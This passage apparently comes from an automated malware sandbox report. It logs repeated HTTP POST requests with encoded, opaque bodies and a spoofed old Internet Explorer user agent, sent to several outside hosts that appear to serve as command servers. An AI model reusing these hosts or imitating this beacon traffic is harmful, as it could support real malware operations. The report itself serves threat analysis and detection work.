51 78 70 4e 4b 48 71 72 32 67 79 68 33 75 61 4f 53 4f 64 43 68 6b 32 52 67 45 6c 72 31 7a 6b 62 4c 64 2f 68 38 6d 72 69 4f 77 56 30 4f 52 2f 77 6c 2f 6b 75 7a 31 74 43 46 51 7a 77 5a 49 34 46 4e 32 72 4d 4f 77 70 77 6a 6b 58 39 34 77 71 49 37 63 39 39 6d 6d 66 4e 59 49 7a 41 4a 42 39 70 66 67 57 6f 4e 59 4c 6d 78 43 31 70 76 5a 54 33 6e 71 6b 43 68 4f 39 77 5a 33 2f 67 4b 77 67 34 55 78 31 72 62 71 6a 47 70 6a 79 2b 59 48 47 74 38 4b 35 39 4d 47 44 52 43 6f 52 6c 77 62 35 79 6f 75 75 51 77 6c 53 4d 61 53 6b 37 75 63 46 6e 47 6d 6c 7a 44 65 69 61 59 72 6a 6d 46 52 65 45 7a 52 46 30 2b 32 68 52 7a 54 33 6b 51 72 4d 77 4b 54 74 50 6a 62 74 4d 32 48 48 6f 44 78 49 38 5a 57 4e 6e 48 34 45 35 54 76 52 70 57 31 5a 57 62 34 70 54 53 4a Data Ascii: 6LQ11vdnms85CBrgZqTRc0CNo8CtdyotG7P9ZyEDoKhM7Fu2IT4a1qB2srSiq6fBURsZi5XV5SebwijQ5k5rKdHmDs7PtLFgjgKILPph0bvmJVez4fzPyFdHLvNiWRdNT2X3xL5fHJ6FLTSAKiVLIRYeuyPxgLIzNuEqq26EIyi1rUYK/LWZB4cIqVERMz/BHQcRqnW6sbo4oZnWBhTZI1Vdnv95lsDWJmo+tD/KfRIVZI+kVCgRFtZrM9OKLh4oDcEatMvm9wabHTOjavRzpPwEas0/rS3ey5zF3tXeAPMe5odyu6Jbt7QxpNKHqr2gyh3uaOSOdChk2RgElr1zkbLd/h8mriOwV0OR/wl/kuz1tCFQzwZI4FN2rMOwpwjkX94wqI7c99mmfNYIzAJB9pfgWoNYLmxC1pvZT3nqkChO9wZ3/gKwg4Ux1rbqjGpjy+YHGt8K59MGDRCoRlwb5youuQwlSMaSk7ucFnGmlzDeiaYrjmFReEzRF0+2hRzT3kQrMwKTtPjbtM2HHoDxI8ZWNnH4E5TvRpW1ZWb4pTSJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 77 77 6d 76 5a 4e 2b 6f 72 38 39 6e 31 68 51 7a 50 6d 42 71 51 32 6a 4b 76 6e 79 31 6e 6a 6b 6f 67 35 5a 41 64 77 31 71 65 45 47 56 43 53 38 35 50 57 38 4f 51 71 75 73 4f 63 47 6a 36 72 70 34 35 45 63 7a 69 63 65 67 2f 6b 78 67 77 2f 63 48 6f 4f 67 61 5a 59 7a 34 6a 48 41 75 43 6d 53 38 73 63 43 6b 67 32 41 2b 2f 30 78 50 41 71 30 53 32 57 7a 64 64 6c 42 32 48 4b 72 66 44 2f 39 66 62 69 58 76 30 4b 33 69 58 6f 47 44 38 33 66 65 4a 77 49 6e 4f 32 50 46 4f 4e 58 66 49 48 7a 2f 39 63 32 56 64 6b 59 42 6a 48 43 45 4d 4c 53 67 6b 6d 5a 71 62 47 50 4d 4d 58 63 6b 51 37 69 6e 38 38 5a 74 2f 52 6f 57 37 6f 33 6c 2b 55 53 55 79 34 48 67 39 33 57 63 70 6d 48 4a 4b 4d 4f 37 75 41 32 75 79 4c 6b 42 69 4d 76 73 5a 44 77 6a 31 59 69 34 35 67 4f 73 30 53 78 54 45 73 57 38 35 64 65 4d 6d 51 39 76 56 37 78 37 48 44 48 5a 65 4f 6c 77 47 4d 34 31 39 54 4f 45 62 70 78 57 31 31 37 74 31 43 47 73 79 39 77 6d 48 77 4f 76 36 67 37 66 62 51 31 55 6d 63 41 55 4d 6c 6c 75 64 7a 59 64 32 72 67 32 66 32 30 38 51 57 38 5a 4b 33 33 46 57 2b 70 55 36 52 37 6f 71 34 35 38 55 38 63 6b 4e 75 2f 39 44 70 41 4a 6f 6f 67 36 62 68 70 6d 4f 4f 65 48 6b 78 79 35 54 6e 30 38 57 49 65 4a 51 70 4d 39 51 52 77 6e 37 73 65 67 79 43 48 57 6b 4a 77 39 65 4c 54 31 76 6c 50 76 33 75 4e 51 50 44 75 75 55 52 34 48 61 31 50 6e 39 4c 49 71 4f 49 4f 79 76 36 6d 49 30 51 46 7a 45 64 64 42 69 61 4a 74 53 57 2b 31 56 30 30 4e 6b 61 62 6f 64 74 4c 50 49 69 69 46 63 6f 77 54 73 41 5a 55 77 6e 4b 6d 37 39 52 6b 6b 4e 5a 44 4c 45 56 58 63 59 70 41 52 4a 41 4e 38 58 77 42 66 4e 74 57 61 57 6f 49 49 58 7a 46 7a 44 66 7a 6b 69 2f 32 50 32 45 57 65 4e 76 5a 4f 69 38 4d 45 6c 68 51 72 63 55 53 55 63 6f 42 4a 33 2f 42 52 76 37 69 37 78 4c 4f 38 31 4e 58 43 59 2f 62 35 2f 30 6e 59 5a 49 6e 56 37 36 31 4e 51 3d 3d Data Ascii: wwmvZN+or89n1hQzPmBqQ2jKvny1njkog5ZAdw1qeEGVCS85PW8OQqusOcGj6rp45Ecziceg/kxgw/cHoOgaZYz4jHAuCmS8scCkg2A+/0xPAq0S2WzddlB2HKrfD/9fbiXv0K3iXoGD83feJwInO2PFONXfIHz/9c2VdkYBjHCEMLSgkmZqbGPMMXckQ7in88Zt/RoW7o3l+USUy4Hg93WcpmHJKMO7uA2uyLkBiMvsZDwj1Yi45gOs0SxTEsW85deMmQ9vV7x7HDHZeOlwGM419TOEbpxW117t1CGsy9wmHwOv6g7fbQ1UmcAUMlludzYd2rg2f208QW8ZK33FW+pU6R7oq458U8ckNu/9DpAJoog6bhpmOOeHkxy5Tn08WIeJQpM9QRwn7segyCHWkJw9eLT1vlPv3uNQPDuuUR4Ha1Pn9LIqOIOyv6mI0QFzEddBiaJtSW+1V00NkabodtLPIiiFcowTsAZUwnKm79RkkNZDLEVXcYpARJAN8XwBfNtWaWoIIXzFzDfzki/2P2EWeNvZOi8MElhQrcUSUcoBJ3/BRv7i7xLO81NXCY/b5/0nYZInV761NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 69 75 70 6b 57 6c 4e 54 72 38 2f 75 43 4f 34 47 47 6b 43 6b 78 76 7a 38 4a 78 4d 35 33 4d 51 4c 4e 38 36 79 7a 6d 57 53 74 50 4e 32 41 6a 57 34 6d 6a 69 71 30 6c 34 58 73 38 6c 4a 49 63 6d 44 4c 4e 32 55 31 6c 59 41 48 48 38 4f 49 50 34 79 53 69 34 69 76 64 65 45 54 5a 35 76 72 51 2f 77 74 36 45 48 4b 63 50 44 72 6f 2f 73 30 65 50 45 53 46 34 33 44 53 51 4b 54 4d 49 5a 6d 6b 63 30 2b 50 73 7a 69 7a 74 2f 45 30 43 6e 77 33 78 37 4b 4a 7a 73 6a 4d 43 68 61 39 53 30 74 35 51 4c 51 72 74 5a 51 36 58 6e 33 77 6d 32 6b 52 63 49 57 2f 72 37 4b 5a 4e 50 76 36 76 2b 6f 66 77 6d 71 30 54 48 63 77 36 71 51 46 5a 4a 74 46 62 44 4f 49 34 4a 67 4c 67 5a 6e 4d 4e 73 70 78 77 37 79 6a 46 49 69 4b 74 4e 71 6d 6b 6f 78 74 50 54 6b 31 38 62 30 6e 43 75 54 7a 38 75 74 51 4e 67 63 70 2f 56 73 66 65 68 78 67 6a 33 6e 30 6a 75 36 6c 71 5a 78 49 4f 62 57 54 51 5a 42 46 42 4a 72 4a 78 39 44 37 50 66 46 32 67 6e 47 41 2b 4c 56 6d 67 31 4a 78 31 43 34 35 4b 4d 39 42 52 45 47 45 39 64 31 4c 4b 34 4c 59 75 34 33 68 54 34 78 42 4f 39 53 37 38 6b 30 35 55 67 6f 71 53 76 38 4c 2f 71 36 67 44 70 77 54 54 58 75 49 6c 48 70 75 5a 67 51 79 68 66 61 77 34 39 69 6a 43 38 6c 76 30 47 53 71 7a 79 64 76 47 36 30 73 39 49 31 6f 54 64 71 78 63 4e 6d 4e 78 57 5a 6b 56 4e 71 6d 4a 55 51 42 62 79 77 6c 56 69 62 79 54 65 66 4b 79 58 50 4b 48 2b 47 6a 43 36 79 4e 68 46 70 62 44 76 32 49 66 38 31 6f 5a 65 77 79 71 30 2b 6d 62 35 7a 4f 6a 50 42 79 73 6e 66 54 55 35 77 59 6e 52 44 58 46 62 33 30 56 52 62 73 57 6e 71 30 55 44 72 61 5a 76 6f 30 63 4d 6b 39 31 44 59 2f 75 4b 69 41 70 4f 4f 6d 5a 64 37 6a 72 5a 42 4e 47 65 72 70 39 72 38 50 6d 38 2b 39 59 79 46 47 59 50 72 37 6c 4d 79 79 71 73 68 71 37 52 73 78 53 75 44 63 78 4b 59 30 73 44 71 35 73 3d Data Ascii: iupkWlNTr8/uCO4GGkCkxvz8JxM53MQLN86yzmWStPN2AjW4mjiq0l4Xs8lJIcmDLN2U1lYAHH8OIP4ySi4ivdeETZ5vrQ/wt6EHKcPDro/s0ePESF43DSQKTMIZmkc0+Pszizt/E0Cnw3x7KJzsjMCha9S0t5QLQrtZQ6Xn3wm2kRcIW/r7KZNPv6v+ofwmq0THcw6qQFZJtFbDOI4JgLgZnMNspxw7yjFIiKtNqmkoxtPTk18b0nCuTz8utQNgcp/Vsfehxgj3n0ju6lqZxIObWTQZBFBJrJx9D7PfF2gnGA+LVmg1Jx1C45KM9BREGE9d1LK4LYu43hT4xBO9S78k05UgoqSv8L/q6gDpwTTXuIlHpuZgQyhfaw49ijC8lv0GSqzydvG60s9I1oTdqxcNmNxWZkVNqmJUQBbywlVibyTefKyXPKH+GjC6yNhFpbDv2If81oZewyq0+mb5zOjPBysnfTU5wYnRDXFb30VRbsWnq0UDraZvo0cMk91DY/uKiApOOmZd7jrZBNGerp9r8Pm8+9YyFGYPr7lMyyqshq7RsxSuDcxKY0sDq5s=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 77 77 6d 76 5a 4e 2b 6f 72 38 39 6e 31 68 51 7a 50 6d 42 71 51 32 6a 4b 76 6e 79 31 6e 6a 6b 6f 67 35 5a 41 64 77 31 71 65 45 47 56 43 53 38 35 50 57 38 4f 51 71 75 73 4f 63 47 6a 36 72 70 34 35 45 63 7a 69 63 65 67 2f 6b 78 67 77 2f 63 48 6f 4f 67 61 5a 59 7a 34 6a 48 41 75 43 6d 53 38 73 63 43 6b 67 32 41 2b 2f 30 78 50 41 71 30 53 32 57 7a 64 64 6c 42 32 48 4b 72 66 44 2f 39 66 62 69 58 76 30 4b 33 69 58 6f 47 44 38 33 66 65 4a 77 49 6e 4f 32 50 46 4f 4e 58 66 49 48 7a 2f 39 63 32 56 64 6b 59 42 6a 48 43 45 4d 4c 53 67 6b 6d 5a 71 62 47 50 4d 4d 58 63 6b 51 37 69 6e 38 38 5a 74 2f 52 6f 57 37 6f 33 6c 2b 55 53 55 79 34 48 67 39 33 57 63 70 6d 48 4a 4b 4d 4f 37 75 41 32 75 79 4c 6b 42 69 4d 76 73 5a 44 77 6a 31 59 69 34 35 67 4f 73 30 53 78 54 45 73 57 38 35 64 65 4d 6d 51 39 76 56 37 78 37 48 44 48 5a 65 4f 6c 77 47 4d 34 31 39 54 4f 45 62 70 78 57 31 31 37 74 31 43 47 73 79 39 77 6d 48 77 4f 76 36 67 37 66 62 51 31 55 6d 63 41 55 4d 6c 6c 75 64 7a 59 64 32 72 67 32 66 32 30 38 51 57 38 5a 4b 33 33 46 57 2b 70 55 36 52 37 6f 71 34 35 38 55 38 63 6b 4e 75 2f 39 44 70 41 4a 6f 6f 67 36 62 68 70 6d 4f 4f 65 48 6b 78 79 35 54 6e 30 38 57 49 65 4a 51 70 4d 39 51 52 77 6e 37 73 65 67 79 43 48 57 6b 4a 77 39 65 4c 54 31 76 6c 50 76 33 75 4e 51 50 44 75 75 55 52 34 48 61 31 50 6e 39 4c 49 71 4f 49 4f 79 76 36 6d 49 30 51 46 7a 45 64 64 42 69 61 4a 74 53 57 2b 31 56 30 30 4e 6b 61 62 6f 64 74 4c 50 49 69 69 46 63 6f 77 54 73 41 5a 55 77 6e 4b 6d 37 39 52 6b 6b 4e 5a 44 4c 45 56 58 63 59 70 41 52 4a 41 4e 38 58 77 42 66 4e 74 57 61 57 6f 49 49 58 7a 46 7a 44 66 7a 6b 69 2f 32 50 32 45 57 65 4e 76 5a 4f 69 38 4d 45 6c 68 51 72 63 55 53 55 63 6f 42 4a 33 2f 42 52 76 37 69 37 78 4c 4f 38 31 4e 58 43 59 2f 62 35 2f 30 6e 59 5a 49 6e 56 37 36 31 4e 51 3d 3d Data Ascii: wwmvZN+or89n1hQzPmBqQ2jKvny1njkog5ZAdw1qeEGVCS85PW8OQqusOcGj6rp45Ecziceg/kxgw/cHoOgaZYz4jHAuCmS8scCkg2A+/0xPAq0S2WzddlB2HKrfD/9fbiXv0K3iXoGD83feJwInO2PFONXfIHz/9c2VdkYBjHCEMLSgkmZqbGPMMXckQ7in88Zt/RoW7o3l+USUy4Hg93WcpmHJKMO7uA2uyLkBiMvsZDwj1Yi45gOs0SxTEsW85deMmQ9vV7x7HDHZeOlwGM419TOEbpxW117t1CGsy9wmHwOv6g7fbQ1UmcAUMlludzYd2rg2f208QW8ZK33FW+pU6R7oq458U8ckNu/9DpAJoog6bhpmOOeHkxy5Tn08WIeJQpM9QRwn7segyCHWkJw9eLT1vlPv3uNQPDuuUR4Ha1Pn9LIqOIOyv6mI0QFzEddBiaJtSW+1V00NkabodtLPIiiFcowTsAZUwnKm79RkkNZDLEVXcYpARJAN8XwBfNtWaWoIIXzFzDfzki/2P2EWeNvZOi8MElhQrcUSUcoBJ3/BRv7i7xLO81NXCY/b5/0nYZInV761NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 4a 31 41 42 5a 59 71 72 72 38 38 6c 67 51 34 49 37 61 55 74 68 30 33 39 48 58 41 36 57 68 6e 51 58 71 5a 39 76 77 46 30 54 6c 69 43 70 46 7a 72 76 45 6b 74 62 44 68 69 78 52 69 6b 50 59 4b 71 73 67 49 76 30 51 4d 30 30 74 67 47 56 6e 47 2b 35 30 59 61 74 77 46 58 63 71 61 2f 38 35 64 49 77 74 6a 73 70 64 35 6b 75 41 65 39 61 75 47 37 64 36 42 58 32 48 38 62 72 59 6a 7a 50 35 74 6a 35 34 38 37 47 63 59 77 70 66 6d 39 46 72 67 55 63 71 42 4c 64 52 6b 71 4c 73 53 6a 46 55 6f 73 63 41 5a 75 78 41 77 42 50 59 4c 54 66 62 6d 6b 68 6f 54 56 73 49 59 46 47 6f 77 79 67 70 49 4e 79 51 75 49 50 4f 54 50 59 75 75 45 6e 4c 42 6d 51 6c 6c 77 6a 57 54 59 2f 73 59 37 61 33 5a 68 47 44 37 79 4e 37 2f 76 44 43 77 69 69 53 4d 6e 78 72 35 77 58 76 71 39 49 30 76 39 44 63 2b 4b 2f 5a 49 6e 37 4a 72 59 54 35 48 6a 35 71 51 47 71 56 56 4a 72 75 4c 35 52 38 74 36 6e 36 4c 58 34 33 68 6c 33 46 65 69 73 38 41 75 41 51 5a 59 6f 32 48 77 6a 6e 63 54 4e 38 39 6f 73 73 43 64 42 6d 53 37 46 4c 74 53 34 2f 74 44 50 34 78 2b 37 52 4e 6a 6f 30 39 71 45 50 71 39 55 68 6b 2b 6d 58 6b 54 51 79 30 69 79 31 4b 33 73 48 58 69 37 34 48 4a 6b 5a 33 53 36 79 4b 37 6f 6e 44 5a 76 64 49 75 36 5a 46 48 57 53 67 31 67 54 4e 59 6a 56 70 2b 33 41 6a 37 46 36 32 57 4c 58 50 30 50 50 74 37 7a 57 34 37 6f 2b 6c 37 4a 58 67 6c 62 72 4e 75 4a 45 45 49 4c 43 69 53 73 53 6b 69 76 57 50 71 37 71 61 6b 35 43 67 44 66 43 45 7a 69 57 35 78 4b 52 62 36 4d 68 63 6e 68 71 5a 79 75 43 70 34 46 35 67 78 57 6c 79 58 4d 4c 4e 76 45 37 43 6d 53 45 34 72 36 68 57 65 30 57 30 79 41 78 36 37 50 66 71 4c 6c 6e 63 6e 6c 6b 2f 67 64 6e 39 52 4d 46 67 69 6b 36 70 68 63 77 39 6b 2f 67 30 4f 4b 4b 49 68 79 69 58 36 32 52 38 6d 44 55 52 4c 43 47 41 46 76 4b 5a 71 4e 6c 32 68 34 2b 75 30 57 4a 44 5a 36 78 53 55 44 51 3d 3d Data Ascii: J1ABZYqrr88lgQ4I7aUth039HXA6WhnQXqZ9vwF0TliCpFzrvEktbDhixRikPYKqsgIv0QM00tgGVnG+50YatwFXcqa/85dIwtjspd5kuAe9auG7d6BX2H8brYjzP5tj5487GcYwpfm9FrgUcqBLdRkqLsSjFUoscAZuxAwBPYLTfbmkhoTVsIYFGowygpINyQuIPOTPYuuEnLBmQllwjWTY/sY7a3ZhGD7yN7/vDCwiiSMnxr5wXvq9I0v9Dc+K/ZIn7JrYT5Hj5qQGqVVJruL5R8t6n6LX43hl3Feis8AuAQZYo2HwjncTN89ossCdBmS7FLtS4/tDP4x+7RNjo09qEPq9Uhk+mXkTQy0iy1K3sHXi74HJkZ3S6yK7onDZvdIu6ZFHWSg1gTNYjVp+3Aj7F62WLXP0PPt7zW47o+l7JXglbrNuJEEILCiSsSkivWPq7qak5CgDfCEziW5xKRb6MhcnhqZyuCp4F5gxWlyXMLNvE7CmSE4r6hWe0W0yAx67PfqLlncnlk/gdn9RMFgik6phcw9k/g0OKKIhyiX62R8mDURLCGAFvKZqNl2h4+u0WJDZ6xSUDQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 30 49 57 4a 59 47 65 47 72 38 2b 62 4f 33 71 67 46 74 44 30 31 7a 44 6c 42 42 37 64 58 70 56 4b 69 38 42 61 31 61 79 46 41 67 31 59 6a 51 66 45 70 76 79 61 56 78 7a 56 67 4e 59 73 44 49 73 6f 51 76 34 78 6c 35 38 64 6f 79 55 6f 36 6b 75 75 59 53 32 6b 5a 59 2b 6e 4c 59 42 44 4f 30 75 76 43 4d 59 68 76 71 2f 50 74 78 61 6d 67 55 52 62 35 76 68 66 7a 42 43 65 69 44 4b 39 62 45 6d 4a 4b 45 4f 64 4c 2b 2f 54 6c 54 4e 53 2f 68 54 36 50 4c 44 32 59 4a 62 59 34 30 74 34 58 6d 63 62 36 43 4f 59 2b 79 59 62 36 31 49 67 34 64 6e 46 4b 2b 76 50 43 61 44 2b 71 52 46 74 42 74 48 65 4e 66 39 6d 42 44 61 41 55 6a 73 6a 42 55 2f 47 49 37 53 6f 58 76 38 4b 34 67 4f 30 46 35 45 31 79 54 77 69 6e 36 78 48 32 38 59 69 69 4f 4d 41 56 41 78 35 44 50 67 48 6b 41 57 55 62 68 55 79 2f 48 58 46 79 67 64 45 59 53 62 4e 73 68 77 62 75 6f 53 6b 57 30 6f 69 50 69 75 69 72 71 63 6c 77 50 39 78 59 74 6c 37 70 4b 6b 74 6e 55 77 65 55 30 6f 52 43 55 4d 55 68 37 6c 42 51 4b 71 65 61 4c 37 47 47 6d 31 78 35 71 4d 57 6d 41 31 54 37 6d 65 39 53 74 35 47 62 59 44 76 58 35 68 36 36 4b 6c 64 33 53 36 51 7a 62 4a 6f 75 57 43 47 73 77 37 2f 64 68 77 53 39 79 7a 51 74 74 61 69 53 4e 77 4f 4e 50 65 65 38 7a 76 33 2f 48 36 78 78 39 4f 67 4e 6c 4c 77 32 78 62 38 72 4d 59 76 77 33 4c 63 77 6b 73 51 4d 2f 33 45 68 73 31 59 65 39 4e 68 34 71 51 49 2f 49 6a 30 4b 39 59 59 50 34 43 7a 65 58 33 44 30 71 4e 75 6d 6c 73 68 4b 7a 52 5a 37 51 33 61 6a 39 53 77 63 56 57 36 31 49 43 59 56 79 30 58 63 4d 62 46 50 69 52 67 79 35 35 62 69 39 4e 59 39 36 38 70 54 35 67 54 51 2f 32 64 46 4f 37 31 4e 43 70 6e 47 31 48 63 4c 73 6a 57 71 67 3d 3d Data Ascii: 0IWJYGeGr8+bO3qgFtD01zDlBB7dXpVKi8Ba1ayFAg1YjQfEpvyaVxzVgNYsDIsoQv4xl58doyUo6kuuYS2kZY+nLYBDO0uvCMYhvq/PtxamgURb5vhfzBCeiDK9bEmJKEOdL+/TlTNS/hT6PLD2YJbY40t4Xmcb6COY+yYb61Ig4dnFK+vPCaD+qRFtBtHeNf9mBDaAUjsjBU/GI7SoXv8K4gO0F5E1yTwin6xH28YiiOMAVAx5DPgHkAWUbhUy/HXFygdEYSbNshwbuoSkW0oiPiuirqclwP9xYtl7pKktnUweU0oRCUMUh7lBQKqeaL7GGm1x5qMWmA1T7me9St5GbYDvX5h66Kld3S6QzbJouWCGsw7/dhwS9yzQttaiSNwONPee8zv3/H6xx9OgNlLw2xb8rMYvw3LcwksQM/3Ehs1Ye9Nh4qQI/Ij0K9YYP4CzeX3D0qNumlshKzRZ7Q3aj9SwcVW61ICYVy0XcMbFPiRgy55bi9NY968pT5gTQ/2dFO71NCpnG1HcLsjWqg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 77 77 6d 76 5a 4e 2b 6f 72 38 39 6e 31 68 51 7a 50 6d 42 71 51 32 6a 4b 76 6e 79 31 6e 6a 6b 6f 67 35 5a 41 64 77 31 71 65 45 47 56 43 53 38 35 50 57 38 4f 51 71 75 73 4f 63 47 6a 36 72 70 34 35 45 63 7a 69 63 65 67 2f 6b 78 67 77 2f 63 48 6f 4f 67 61 5a 59 7a 34 6a 48 41 75 43 6d 53 38 73 63 43 6b 67 32 41 2b 2f 30 78 50 41 71 30 53 32 57 7a 64 64 6c 42 32 48 4b 72 66 44 2f 39 66 62 69 58 76 30 4b 33 69 58 6f 47 44 38 33 66 65 4a 77 49 6e 4f 32 50 46 4f 4e 58 66 49 48 7a 2f 39 63 32 56 64 6b 59 42 6a 48 43 45 4d 4c 53 67 6b 6d 5a 71 62 47 50 4d 4d 58 63 6b 51 37 69 6e 38 38 5a 74 2f 52 6f 57 37 6f 33 6c 2b 55 53 55 79 34 48 67 39 33 57 63 70 6d 48 4a 4b 4d 4f 37 75 41 32 75 79 4c 6b 42 69 4d 76 73 5a 44 77 6a 31 59 69 34 35 67 4f 73 30 53 78 54 45 73 57 38 35 64 65 4d 6d 51 39 76 56 37 78 37 48 44 48 5a 65 4f 6c 77 47 4d 34 31 39 54 4f 45 62 70 78 57 31 31 37 74 31 43 47 73 79 39 77 6d 48 77 4f 76 36 67 37 66 62 51 31 55 6d 63 41 55 4d 6c 6c 75 64 7a 59 64 32 72 67 32 66 32 30 38 51 57 38 5a 4b 33 33 46 57 2b 70 55 36 52 37 6f 71 34 35 38 55 38 63 6b 4e 75 2f 39 44 70 41 4a 6f 6f 67 36 62 68 70 6d 4f 4f 65 48 6b 78 79 35 54 6e 30 38 57 49 65 4a 51 70 4d 39 51 52 77 6e 37 73 65 67 79 43 48 57 6b 4a 77 39 65 4c 54 31 76 6c 50 76 33 75 4e 51 50 44 75 75 55 52 34 48 61 31 50 6e 39 4c 49 71 4f 49 4f 79 76 36 6d 49 30 51 46 7a 45 64 64 42 69 61 4a 74 53 57 2b 31 56 30 30 4e 6b 61 62 6f 64 74 4c 50 49 69 69 46 63 6f 77 54 73 41 5a 55 77 6e 4b 6d 37 39 52 6b 6b 4e 5a 44 4c 45 56 58 63 59 70 41 52 4a 41 4e 38 58 77 42 66 4e 74 57 61 57 6f 49 49 58 7a 46 7a 44 66 7a 6b 69 2f 32 50 32 45 57 65 4e 76 5a 4f 69 38 4d 45 6c 68 51 72 63 55 53 55 63 6f 42 4a 33 2f 42 52 76 37 69 37 78 4c 4f 38 31 4e 58 43 59 2f 62 35 2f 30 6e 59 5a 49 6e 56 37 36 31 4e 51 3d 3d Data Ascii: wwmvZN+or89n1hQzPmBqQ2jKvny1njkog5ZAdw1qeEGVCS85PW8OQqusOcGj6rp45Ecziceg/kxgw/cHoOgaZYz4jHAuCmS8scCkg2A+/0xPAq0S2WzddlB2HKrfD/9fbiXv0K3iXoGD83feJwInO2PFONXfIHz/9c2VdkYBjHCEMLSgkmZqbGPMMXckQ7in88Zt/RoW7o3l+USUy4Hg93WcpmHJKMO7uA2uyLkBiMvsZDwj1Yi45gOs0SxTEsW85deMmQ9vV7x7HDHZeOlwGM419TOEbpxW117t1CGsy9wmHwOv6g7fbQ1UmcAUMlludzYd2rg2f208QW8ZK33FW+pU6R7oq458U8ckNu/9DpAJoog6bhpmOOeHkxy5Tn08WIeJQpM9QRwn7segyCHWkJw9eLT1vlPv3uNQPDuuUR4Ha1Pn9LIqOIOyv6mI0QFzEddBiaJtSW+1V00NkabodtLPIiiFcowTsAZUwnKm79RkkNZDLEVXcYpARJAN8XwBfNtWaWoIIXzFzDfzki/2P2EWeNvZOi8MElhQrcUSUcoBJ3/BRv7i7xLO81NXCY/b5/0nYZInV761NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 77 4a 4e 79 49 6e 50 53 74 63 39 6f 58 64 42 4d 75 6e 57 2f 78 78 78 70 49 52 7a 5a 6d 61 4e 77 56 2b 38 32 35 64 2b 37 72 31 68 35 6b 6c 5a 64 48 5a 36 53 67 78 42 63 2f 76 66 71 5a 6a 33 33 6d 4c 4e 36 72 49 6f 53 4f 35 31 6c 2b 52 66 73 6b 58 51 73 4e 6f 34 74 78 57 54 59 32 6b 4e 47 53 67 4a 4d 35 61 74 43 51 53 34 53 6e 6e 73 49 42 77 78 45 66 59 6b 35 52 31 42 42 4f 30 37 77 54 51 35 75 32 52 6e 74 61 42 32 34 71 49 33 37 39 6e 43 42 44 62 71 35 77 32 65 4d 68 47 30 64 65 79 4f 35 49 73 37 4d 4a 4c 33 6d 57 7a 63 66 52 30 36 32 30 6a 48 78 30 55 46 32 53 46 4c 4f 77 4b 44 4b 76 6a 62 6c 67 68 70 6d 4f 52 6e 75 62 51 50 55 6c 59 6d 59 64 6b 59 6c 51 49 6e 79 79 46 4e 65 75 49 6c 6a 4a 30 7a 4f 68 6c 50 54 43 54 53 34 4b 2b 4a 69 68 65 78 70 36 55 6b 77 31 42 33 72 41 32 4e 71 54 4e 74 4d 6f 31 6f 35 74 6f 2f 67 63 48 4a 58 76 77 44 4c 6a 45 46 31 78 48 59 44 50 38 38 52 41 66 70 68 4b 6c 44 5a 31 42 67 2f 48 69 2b 41 6f 47 39 56 34 45 31 45 54 34 45 65 32 78 4d 77 68 64 62 76 30 63 44 37 38 48 6e 77 59 68 67 76 46 4b 49 64 38 45 38 77 54 4a 62 6c 75 71 69 48 53 4b 48 68 38 63 46 78 6a 75 75 7a 6f 6d 45 37 75 71 6e 64 52 37 5a 34 74 54 4b 72 54 59 4d 73 74 50 39 49 62 53 4a 78 31 73 42 78 4f 54 6c 61 79 65 53 68 4d 34 64 43 55 7a 30 30 46 34 4f 39 61 58 49 6c 37 37 52 70 71 55 2b 4d 75 6f 63 63 57 39 35 31 66 77 32 34 4f 70 2b 75 59 36 55 37 67 43 50 38 76 79 38 6d 54 33 71 49 79 53 73 77 55 50 74 34 67 54 4e 54 33 51 6a 58 35 34 31 4d 34 4a 6f 6d 56 74 41 56 37 4d 49 55 69 4c 4e 50 35 74 4a 61 6c 67 6d 55 74 78 55 38 53 54 35 52 61 69 36 58 38 59 6d 71 61 53 76 6b 66 72 59 46 4e 75 51 76 64 48 6b 4a 49 68 46 6c 39 54 32 76 42 75 4f 2f 77 71 6b 79 32 55 4c 53 37 64 70 41 33 4f 73 3d Data Ascii: 